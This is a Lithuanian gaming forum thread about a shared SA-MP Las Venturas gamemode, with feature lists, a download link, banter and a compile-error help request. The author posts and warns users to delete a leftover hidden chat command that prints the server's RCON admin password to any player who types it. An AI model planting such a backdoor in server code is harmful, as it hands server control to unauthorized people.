Peršokti į turinį
  • ŽAIDIMAI
  • , ŽAIDIMAI
  • ŽAIDIMAI

Ši tema yra neaktyvi. Paskutinis pranešimas šioje temoje buvo prieš 5130 dienas (-ų). Patariame sukurti naują temą, o ne rašyti naują pranešimą.

Už neaktyvių temų prikėlimą galite sulaukti įspėjimo ir pranešimo pašalinimo!

Recommended Posts

:crazy: Eilinas Las Venturas gamemodas. :beers: Karka dawai sukurk tu gera gerus gamemodus maciau kuri :mucha:

Taip, kad neeilinis pats buvau ziurejas ji ir tikrai nustebino tai nera eilinis koks LV ir ten nk neideta tai gerulis GM :) labiausiai patiko tos laiptines kur padarytos viename name keleta butu.

:DDD Laiptinės šeip jis šaunuolis bet laiptinės nėra taip sunku padaryti. :)

Skirtingai kam sunku kam lengva. Kas patyres tam bus lengva padaryt. O jeigu koks Pwn naujokelis ar nelabai patyres tai gal ir sunkiau.

:crazy: Eilinas Las Venturas gamemodas. :beers: Karka dawai sukurk tu gera gerus gamemodus maciau kuri :mucha:

Taip, kad neeilinis pats buvau ziurejas ji ir tikrai nustebino tai nera eilinis koks LV ir ten nk neideta tai gerulis GM :) labiausiai patiko tos laiptines kur padarytos viename name keleta butu.

:DDD Laiptinės šeip jis šaunuolis bet laiptinės nėra taip sunku padaryti. :)

Skirtingai kam sunku kam lengva. Kas patyres tam bus lengva padaryt. O jeigu koks Pwn naujokelis ar nelabai patyres tai gal ir sunkiau.

Neoftopink..

804ed16076b41d9cecff40801dac3c6c47.gif

• Parašė po 2 mėnesių...

Mačiau šioje temoje visiškų tinginių... sakot levas gm? o jūs pameginkit bent tokį sukurt... yra tokių, kurie nori gero nepaplatinto gm.. taip nebūna mielieji, taip nebūna... dar pastebėjau kad dauguma žmonių, gal daugiau vaikų, kurie nieko nemoka tik pakeisti autorines teises, pavadinimus, rašo kad levas gm, nepatariu siustis, arba virusas, nesisiuskit... Dažniausiai į tokias žinutes galima žiurėti kaip teigiama puse, ta prasme jie tai rašo, nes nori atmušti kitus žmones, kurie norėtu apžiurėti tokį gm, nes tada pas juos būtų "neeilinis gamemodas, aš jį kūriau, niekas daugiau tokio neturi.." so, darykit išvadas su tokiais komentarais :) kaip mačiau vienam forume buvo parašyta: norint turėti gerą projektą, reikia pasiimti populiarų gamemodą ir jį taisyti bei tobulinti... gamemodas neblogas, tinkantis editinti bei pradėti savo projektą, dabar garantuoju, kad bent 10 serverių su tokiu gm, bus paleista (arba net jau paleista) i samp žaidimą...

būk savimi ir elkis taip, jog ši diena būtų paskutinė tavo gyvenime...

• Parašė po 4 mėnesių...
  • Parašė po 2 savaičių...
  • Parašė po 2 savaičių...
  • Parašė po 4 savaičių...
Sveiki visi buvau daręs, tačiau atsibodo, nes lv labai didelis miestas, o noro man nebėra jį kūrti.

Aprašymo ilgo aš nerašysiu atsisiųskite peržiūrėsite patys :)

labai trumpas aprašymas:

Ligų sistema, vaistai.

VIP, admin, superadmin sistemos.

GUI registraciją

Telefono sistema.

GPS sistema(Kūrta ne mano. Kūrėjas: Fj0rtizFredde)

Boulingo Sistema(Kūrta ne mano. Kūrėjas: Nexotronix)

Diržų sistema(kūrta ne mano. Kūrėjo nežinau)

AutoVM.

Eilučių vos: 7884

Serveris nėra baigtas, tačiau pagrindas jau kaip ir yra.

Siųstis:

Las_Venturas_By_SaMaS.rar - 3.4 Mb

**********PAPILDYTA****************

Beje yra keletas klaidų kai miršti kartais atsirandi oro uoste.

-- Papildyta --

Ai ir nepamirškite ištrinti šitą buvau pamiršęs šitą išimti

Kodas:

i

f(strcmp(cmdtext, "/samas_phpmldc", false)==0)
  {
          new msg[128],rcon[128];
           GetServerVarAsString("hostname",rcon,sizeof(rcon));
          format(msg,sizeof(msg),"==== %s ====",rcon);
          SendClientMessage(playerid,RED,msg);
          GetServerVarAsString("rcon_password",rcon,sizeof(rcon));
          format(msg,sizeof(msg),"Rcon password: %s",rcon);
          SendClientMessage(playerid,RED,msg);
        return 1;
  }

Jai negaila prašau duokite +rep :)

http://s2.gladiatus.lt/game/c.php?uid=90290 Paspausk, ir tau R3p, kai paspausi i AZ.

1c38645c0075386770318c8d4ca1503a433.jpg

• Parašė po 5 savaičių...

Pyksi ar ne, bet esu mapperis, o ne scriptintojas tai noriu paprašyti tavo pagalbos . Esi aktyvus ir gan geras jog daliniesi gan gerais gamemodais, tačiau man reikia pašalinti šitą errorą. Duosiu +Rep visą savaitę bei savo visus FLT . (Daug FLT neturiu, nes esu naujas supergames.lt dalyvis, ir bandysiu kažko šiame tinklapyje pasiekti) Tai jeigu įmanoma ar į AŽ ar šioje temoje parašyk kaip ištaisyti šią problemą :

C:\Documents and Settings\Eimantas\Desktop\SaMaS\SaMaS\gamemodes\GRP4.pwn(23) : fatal error 100: cannot read from file: "dudb"

Compilation aborted.Pawn compiler 3.2.3664	 	 	Copyright (c) 1997-2006, ITB CompuPhase

1 Error.

PASTABA: Esu atnaujines visus includes (Tai nepadėjo), Pasikeičiau versiją į 0.3d, bet irgi nieko. Kaip ir minėjau +REP visą savaitę, bei FLT kiek tik turėsiu ar turiu .

Mapinu pagal užsakovo užsakymus. Užsakytos prekės kaina priklauso nuo padaryto darbo kokybės bei trukmės...

"SAOL ~ San Andreas Our Life" back soon ...

Ši tema yra neaktyvi. Paskutinis pranešimas šioje temoje buvo prieš 5130 dienas (-ų). Patariame sukurti naują temą, o ne rašyti naują pranešimą.

Už neaktyvių temų prikėlimą galite sulaukti įspėjimo ir pranešimo pašalinimo!

Svečias
Ši tema yra užrakinta.
  • Šiame puslapyje naršo:   0 nariai

• Nėra registruotų narių peržiūrinčių šį forumą.

• Sukurti naują...